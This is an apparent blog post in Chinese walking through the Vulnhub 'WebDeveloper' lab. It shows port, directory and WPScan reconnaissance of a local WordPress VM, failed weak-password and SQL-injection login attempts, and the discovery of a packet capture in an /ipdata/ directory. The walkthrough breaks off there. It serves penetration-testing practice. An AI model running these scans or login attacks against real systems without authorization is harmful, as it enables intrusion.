{"id":405,"date":"2024-03-17T01:04:17","date_gmt":"2024-03-16T17:04:17","guid":{"rendered":"http:\/\/162.14.82.114\/?p=405"},"modified":"2024-03-17T01:04:17","modified_gmt":"2024-03-16T17:04:17","slug":"vulnhub-webdeveloper","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/405\/03\/17\/2024\/","title":{"rendered":"Vulnhub&#8211;WebDeveloper"},"content":{"rendered":"<h1>WebDeveloper<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103354.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103354.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240316114613262\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u8fd9\u4e2a\u9776\u573a\u4e0d\u77e5\u9053\u4e3a\u5565\uff0c\u4e0b\u8f7d\u5fd2\u6162\u4e86\u3002\u3002\u3002\u3002\u6362\u4e86\u4e00\u4e2a\u8282\u70b9\u4ee5\u540e\u597d\u591a\u4e86\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103356.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103356.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240316232155403\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5f00\u59cb\uff01<\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">rustscan -a 192.168.37.129 -- -A -sV -sT<\/code><\/pre>\n<pre><code class=\"language-text\">.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nNmap? More like slowmap.\ud83d\udc22\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. \nOpen 192.168.37.129:22\nOpen 192.168.37.129:80\n[~] Starting Script(s)\n[&gt;] Script to be run Some(&quot;nmap -vvv -p {{port}} {{ip}}&quot;)\n\n[~] Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-03-16 11:23 EDT\nNSE: Loaded 156 scripts for scanning.\nNSE: Script Pre-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 11:23\nCompleted NSE at 11:23, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 11:23\nCompleted NSE at 11:23, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 11:23\nCompleted NSE at 11:23, 0.00s elapsed\nInitiating Ping Scan at 11:23\nScanning 192.168.37.129 [2 ports]\nCompleted Ping Scan at 11:23, 0.00s elapsed (1 total hosts)\nInitiating Parallel DNS resolution of 1 host. at 11:23\nCompleted Parallel DNS resolution of 1 host. at 11:23, 0.00s elapsed\nDNS resolution of 1 IPs took 0.00s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]\nInitiating Connect Scan at 11:23\nScanning 192.168.37.129 [2 ports]\nDiscovered open port 22\/tcp on 192.168.37.129\nDiscovered open port 80\/tcp on 192.168.37.129\nCompleted Connect Scan at 11:23, 0.00s elapsed (2 total ports)\nInitiating Service scan at 11:23\nScanning 2 services on 192.168.37.129\nCompleted Service scan at 11:23, 7.84s elapsed (2 services on 1 host)\nNSE: Script scanning 192.168.37.129.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 11:23\nCompleted NSE at 11:23, 1.10s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 11:23\nCompleted NSE at 11:23, 0.03s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 11:23\nCompleted NSE at 11:23, 0.00s elapsed\nNmap scan report for 192.168.37.129\nHost is up, received syn-ack (0.00071s latency).\nScanned at 2024-03-16 11:23:03 EDT for 9s\n\nPORT   STATE SERVICE REASON  VERSION\n22\/tcp open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 d2:ac:73:4c:17:ec:6a:82:79:87:5a:f9:22:d4:12:cb (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCkgdNJs41OI0TFS67l3c9wTuvs\/SD7S5kVwofnV5wkDIYa5grQc1J7C1qSImXlX2MQ02Y6VbcsebLpy4NqyAgtV+VBCEqWu6FujA2kwaWN+yL781GaEd3\/Jze9a6Uxse4p5O6\/5TtPeh5bVJTqFALQ9sjsZpwD528x9FfPdmK9voAKD3pzFWLBI4WaKqh2Xy+d3mDLQOc+dULhOymdiuGh+UcaSVQN9WSy9NeECWYxhy\/pkpMGZS4DaVNGsHmQfQicjtaRhPYg8r2ICeAdgpZ2aQWpe1fcUW58t\/uj3eauU3VRJNqiy+yp7hV+dwxrl9NqFKtmTlRvGvy3G8mLRyhJ\n|   256 9c:d5:f3:2c:e2:d0:06:cc:8c:15:5a:5a:81:5b:03:3d (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLrmTuklXg8ulgnCnC8YZZLKR9LbMSSW7QfxBsJUDjgBMVP6PsHYHlNaEY+oHfZtjU2L5VyQufGKoyvaS4CC30k=\n|   256 ab:67:56:69:27:ea:3e:3b:33:73:32:f8:ff:2e:1f:20 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJddm5Qctin2VSmNmkU8zAOzC5y1+4W1u+4ygqepqjKi\n80\/tcp open  http    syn-ack Apache httpd 2.4.29 ((Ubuntu))\n|_http-generator: WordPress 4.9.8\n|_http-server-header: Apache\/2.4.29 (Ubuntu)\n|_http-title: Example site &amp;#8211; Just another WordPress site\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nNSE: Script Post-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 11:23\nCompleted NSE at 11:23, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 11:23\nCompleted NSE at 11:23, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 11:23\nCompleted NSE at 11:23, 0.00s elapsed\nRead data files from: \/usr\/bin\/..\/share\/nmap\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 10.01 seconds<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">feroxbuster -u http:\/\/192.168.37.129 -d 1 -x* -C 404<\/code><\/pre>\n<pre><code class=\"language-text\"> ___  ___  __   __     __      __         __   ___\n|__  |__  |__) |__) | \/  `    \/  \\ \\_\/ | |  \\ |__\n|    |___ |  \\ |  \\ | \\__,    \\__\/ \/ \\ | |__\/ |___\nby Ben &quot;epi&quot; Risher \ud83e\udd13                 ver: 2.10.1\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \ud83c\udfaf  Target Url            \u2502 http:\/\/192.168.37.129\n \ud83d\ude80  Threads               \u2502 50\n \ud83d\udcd6  Wordlist              \u2502 \/usr\/share\/seclists\/Discovery\/Web-Content\/raft-medium-directories.txt\n \ud83d\udca2  Status Code Filters   \u2502 [404]\n \ud83d\udca5  Timeout (secs)        \u2502 7\n \ud83e\udda1  User-Agent            \u2502 feroxbuster\/2.10.1\n \ud83d\udc89  Config File           \u2502 \/etc\/feroxbuster\/ferox-config.toml\n \ud83d\udd0e  Extract Links         \u2502 true\n \ud83d\udcb2  Extensions            \u2502 [*]\n \ud83c\udfc1  HTTP methods          \u2502 [GET]\n \ud83d\udd03  Recursion Depth       \u2502 1\n \ud83c\udf89  New Version Available \u2502 https:\/\/github.com\/epi052\/feroxbuster\/releases\/latest\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \ud83c\udfc1  Press [ENTER] to use the Scan Management Menu\u2122\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n403      GET       11l       32w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n404      GET        9l       32w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n301      GET        9l       28w      322c http:\/\/192.168.37.129\/wp-includes =&gt; http:\/\/192.168.37.129\/wp-includes\/\n301      GET        9l       28w      321c http:\/\/192.168.37.129\/wp-content =&gt; http:\/\/192.168.37.129\/wp-content\/\n301      GET        9l       28w      319c http:\/\/192.168.37.129\/wp-admin =&gt; http:\/\/192.168.37.129\/wp-admin\/\n301      GET        9l       28w      317c http:\/\/192.168.37.129\/ipdata =&gt; http:\/\/192.168.37.129\/ipdata\/\n200      GET       43l       43w     1045c http:\/\/192.168.37.129\/wp-includes\/wlwmanifest.xml\n200      GET        2l      281w    10056c http:\/\/192.168.37.129\/wp-includes\/js\/jquery\/jquery-migrate.min.js\n200      GET      225l      400w     3646c http:\/\/192.168.37.129\/wp-content\/themes\/twentyseventeen\/assets\/css\/ie8.css\n200      GET      209l      846w     5836c http:\/\/192.168.37.129\/wp-content\/themes\/twentyseventeen\/assets\/js\/jquery.scrollTo.js\n200      GET      249l      928w     7682c http:\/\/192.168.37.129\/wp-content\/themes\/twentyseventeen\/assets\/js\/global.js\n200      GET        1l        9w     1398c http:\/\/192.168.37.129\/wp-includes\/js\/wp-embed.min.js\n200      GET      369l     2389w   204846c http:\/\/192.168.37.129\/wp-content\/themes\/twentyseventeen\/assets\/images\/header.jpg\n200      GET       31l       90w      683c http:\/\/192.168.37.129\/wp-content\/themes\/twentyseventeen\/assets\/js\/skip-link-focus-fix.js\n500      GET        0l        0w        0c http:\/\/192.168.37.129\/wp-content\/themes\/twentyseventeen\/\n200      GET      326l     1144w    10330c http:\/\/192.168.37.129\/wp-content\/themes\/twentyseventeen\/assets\/js\/html5.js\n200      GET        6l     1435w    97184c http:\/\/192.168.37.129\/wp-includes\/js\/jquery\/jquery.js\n200      GET     4327l     8642w    83401c http:\/\/192.168.37.129\/wp-content\/themes\/twentyseventeen\/style.css\n301      GET        0l        0w        0c http:\/\/192.168.37.129\/index.php\/ =&gt; http:\/\/192.168.37.129\/\n405      GET        1l        6w       42c http:\/\/192.168.37.129\/xmlrpc.php\n200      GET        1l     2533w    52609c http:\/\/192.168.37.129\/index.php\/wp-json\n200      GET       63l      173w     2160c http:\/\/192.168.37.129\/wp-login.php\n200      GET      319l     3642w    52813c http:\/\/192.168.37.129\/\n[####################] - 7s     30044\/30044   0s      found:21      errors:0      \n[####################] - 7s     30000\/30000   4539\/s  http:\/\/192.168.37.129\/  <\/code><\/pre>\n<p>\u770b\u51fa\u6765\u660e\u663e\u662f\u4e00\u4e2a<code>wordpress<\/code>\u7ad9\uff0c\u4e0d\u8fc7\u8fd8\u662f\u5f97\u5c0f\u5fc3\u3002<\/p>\n<h3>wapplayzer\u63d2\u4ef6\u4fe1\u606f<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103357.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103357.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240317000022561\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u6f0f\u6d1e\u5229\u7528<\/h2>\n<p>\u8bbf\u95ee\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103358.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103358.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240316234844071\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u67e5\u770b\u4e00\u4e0b\u6709\u6ca1\u6709\u6709\u610f\u601d\u7684\u4e1c\u897f\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103359.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103359.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240316234932483\" \/><\/div><\/p>\n<p>\u767b\u5f55\u9875\u9762\uff01\u5c1d\u8bd5\u4e07\u80fd\u5bc6\u7801\u68ad\u4e00\u4e0b\uff0c\u8fdb\u4e0d\u53bb\uff0c\u5e38\u89c1\u7684\u5f31\u5bc6\u7801\u4e5f\u8fdb\u4e0d\u53bb\u3002<\/p>\n<p>\u5c1d\u8bd5\u4e00\u4e0bsql\u6ce8\u5165\u4e86\uff0c\u8fdb\u4e0d\u53bb\u554a\uff0c\u5c1d\u8bd5\u4f7f\u7528<code>WPScan<\/code>\u626b\u63cf\u4e00\u4e0b:<\/p>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">wpscan --url http:\/\/192.168.37.129<\/code><\/pre>\n<pre><code class=\"language-text\">_______________________________________________________________\n         __          _______   _____\n         \\ \\        \/ \/  __ \\ \/ ____|\n          \\ \\  \/\\  \/ \/| |__) | (___   ___  __ _ _ __ \u00ae\n           \\ \\\/  \\\/ \/ |  ___\/ \\___ \\ \/ __|\/ _` | &#039;_ \\\n            \\  \/\\  \/  | |     ____) | (__| (_| | | | |\n             \\\/  \\\/   |_|    |_____\/ \\___|\\__,_|_| |_|\n\n         WordPress Security Scanner by the WPScan Team\n                         Version 3.8.25\n       Sponsored by Automattic - https:\/\/automattic.com\/\n       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart\n_______________________________________________________________\n\n[+] URL: http:\/\/192.168.37.129\/ [192.168.37.129]\n[+] Started: Sat Mar 16 11:56:41 2024\n\nInteresting Finding(s):\n\n[+] Headers\n | Interesting Entry: Server: Apache\/2.4.29 (Ubuntu)\n | Found By: Headers (Passive Detection)\n | Confidence: 100%\n\n[+] XML-RPC seems to be enabled: http:\/\/192.168.37.129\/xmlrpc.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n | References:\n |  - http:\/\/codex.wordpress.org\/XML-RPC_Pingback_API\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_ghost_scanner\/\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/dos\/http\/wordpress_xmlrpc_dos\/\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_xmlrpc_login\/\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_pingback_access\/\n\n[+] WordPress readme found: http:\/\/192.168.37.129\/readme.html\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n\n[+] Upload directory has listing enabled: http:\/\/192.168.37.129\/wp-content\/uploads\/\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n\n[+] The external WP-Cron seems to be enabled: http:\/\/192.168.37.129\/wp-cron.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 60%\n | References:\n |  - https:\/\/www.iplocation.net\/defend-wordpress-from-ddos\n |  - https:\/\/github.com\/wpscanteam\/wpscan\/issues\/1299\n\n[+] WordPress version 4.9.8 identified (Insecure, released on 2018-08-02).\n | Found By: Rss Generator (Passive Detection)\n |  - http:\/\/192.168.37.129\/index.php\/feed\/, &lt;generator&gt;https:\/\/wordpress.org\/?v=4.9.8&lt;\/generator&gt;\n |  - http:\/\/192.168.37.129\/index.php\/comments\/feed\/, &lt;generator&gt;https:\/\/wordpress.org\/?v=4.9.8&lt;\/generator&gt;\n\n[+] WordPress theme in use: twentyseventeen\n | Location: http:\/\/192.168.37.129\/wp-content\/themes\/twentyseventeen\/\n | Last Updated: 2024-01-16T00:00:00.000Z\n | Readme: http:\/\/192.168.37.129\/wp-content\/themes\/twentyseventeen\/README.txt\n | [!] The version is out of date, the latest version is 3.5\n | Style URL: http:\/\/192.168.37.129\/wp-content\/themes\/twentyseventeen\/style.css?ver=4.9.8\n | Style Name: Twenty Seventeen\n | Style URI: https:\/\/wordpress.org\/themes\/twentyseventeen\/\n | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...\n | Author: the WordPress team\n | Author URI: https:\/\/wordpress.org\/\n |\n | Found By: Css Style In Homepage (Passive Detection)\n |\n | Version: 1.7 (80% confidence)\n | Found By: Style (Passive Detection)\n |  - http:\/\/192.168.37.129\/wp-content\/themes\/twentyseventeen\/style.css?ver=4.9.8, Match: &#039;Version: 1.7&#039;\n[+] Enumerating All Plugins (via Passive Methods)\n[i] No plugins Found.\n[+] Enumerating Config Backups (via Passive and Aggressive Methods)\n Checking Config Backups - Time: 00:00:00 &lt;======================================================================================================================&gt; (137 \/ 137) 100.00% Time: 00:00:00\n\n[i] No Config Backups Found.\n\n[!] No WPScan API Token given, as a result vulnerability data has not been output.\n[!] You can get a free API token with 25 daily requests by registering at https:\/\/wpscan.com\/register\n\n[+] Finished: Sat Mar 16 11:56:47 2024\n[+] Requests Done: 171\n[+] Cached Requests: 5\n[+] Data Sent: 42.774 KB\n[+] Data Received: 358.097 KB\n[+] Memory used: 274.473 MB\n[+] Elapsed time: 00:00:05<\/code><\/pre>\n<h3>\u6f0f\u6d1e\u53d1\u6398<\/h3>\n<p>\u5c1d\u8bd5\u627e\u4e00\u4e0b\u8fd9\u4e2a\u7248\u672c\u7684\u6f0f\u6d1e\uff1a<\/p>\n<pre><code class=\"language-bash\">searchsploit wordpress 4.9.8<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103360.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103360.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240317000134837\" \/><\/div><\/p>\n<p>\u4f3c\u4e4e\u6ca1\u6709\u5229\u7528\u8d77\u6765\u6bd4\u8f83\u65b9\u4fbf\u7684\u3002<\/p>\n<p>\u5c1d\u8bd5\u627e\u56de\u5bc6\u7801\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103361.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103361.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240317000218925\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u518d\u627e\u4e00\u4e0b\u4fe1\u606f\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103362.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103362.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240317000318236\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u91cd\u65b0\u770b\u4e4b\u524d\u7684\u4fe1\u606f\u641c\u96c6\u5185\u5bb9\uff0c\u53d1\u73b0\u4e00\u4e2a\u5947\u602a\u7684\u76ee\u5f55\uff1a<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.37.129\/ipdata\/<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103363.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103363.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240317001101631\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u628a\u8fd9\u4e2a\u6570\u636e\u6d41\u6587\u4ef6\u4e0b\u8f7d\u4e0b\u6765\uff0c\u8ffd\u8e2a\u4e00\u4e0b\u6d41\u91cf\uff1a<\/p>\n<p>\u5148\u662fTCP\u6d41\u91cf\uff0c\u6ca1\u5565\u4e1c\u897f\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103364.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103364.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240317001348036\" style=\"zoom:50%;\" 